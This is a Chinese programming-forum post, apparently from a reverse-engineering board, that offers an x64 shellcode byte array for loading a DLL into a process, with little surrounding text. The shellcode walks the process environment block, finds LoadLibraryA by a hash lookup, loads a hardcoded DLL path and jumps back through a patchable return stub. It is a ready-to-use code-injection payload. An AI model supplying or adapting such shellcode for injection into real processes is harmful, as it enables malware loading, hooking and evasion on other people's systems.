编程论坛-编程学习教程分享,编程技术交流,从零开始

 找回密码
 立即注册

QQ登录

只需一步,快速开始

查看: 128|回复: 0

[逆向破解/内核驱动] x64的一段shellcode,加载dll用的,支持所有x64操作系统

[复制链接]

1086

主题

1812

帖子

3724

积分

管理员

Rank: 9Rank: 9Rank: 9

积分
3724

最佳新人活跃会员热心会员推广达人宣传达人灌水之王突出贡献优秀版主荣誉管理论坛元老

发表于 2020-1-11 07:38:34 | 显示全部楼层 |阅读模式
  1. unsigned char shellcode[] = "\xeb\x19\x59\xff\xd0\x48\x83\xc4\x28"
  2. "\x48\xb8\x00\x00\x00\x00\x00\x00\x00\x00\xff\xe0\x90\x90\x90\x90\x90\x90"  //mov rax,0xxxxx jmp rax
  3. "\x48\x83\xEC\x28\x48\x83\xE4\xF0\x65\x4C\x8B\x24\x25\x60\x00\x00\x00"
  4. "\x4D\x8B\x64\x24\x18\x4D\x8B\x64\x24\x20\x4D\x8B\x24\x24"
  5. "\x4D\x8B\x7C\x24\x20\x4D\x8B\x24\x24\x4D\x8B\x64\x24\x20"
  6. "\x48\x31\xC0\x4D\x31\xF6\x48\x31\xDB\x48\x31\xc9\x48\x31"
  7. "\xf6\x41\x8B\x44\x24\x3C\x4C\x01\xE0\x44\x8B\xB0\x88\x00"
  8. "\x00\x00\x4D\x01\xE6\x41\x8B\x4e\x18\x41\x8B\x5E\x20\x4c"
  9. "\x01\xe3\xE3\x8f\x48\xFF\xC9\x8B\x34\x8b\x4C\x01\xE6\x31"
  10. "\xFF\x31\xC0\xFC\xAC\x84\xC0\x74\x07\xC1\xCF\x0D\x01\xC7"
  11. "\xEB\xF4\x81\xFF\x8e\x4e\x0e\xec\x75\xDc\x41\x8B\x5E\x24"
  12. "\x4C\x01\xE3\x48\x31\xc0\x66\x8b\x04\x4b\x41\x8B\x5E\x1C"
  13. "\x4C\x01\xE3\x8B\x04\x83\x4C\x01\xE0\xe8\x4a\xff\xff\xff"
  14. "d:\\dll.dll";
复制代码


不积跬步,无以至千里
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

展开

QQ|Archiver|手机版|小黑屋|从零开始学编程 ( 豫ICP备15032706号-2 )

GMT+8, 2020-1-27 20:43 , Processed in 0.124521 second(s), 31 queries .

Powered by Discuz! X3.4

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表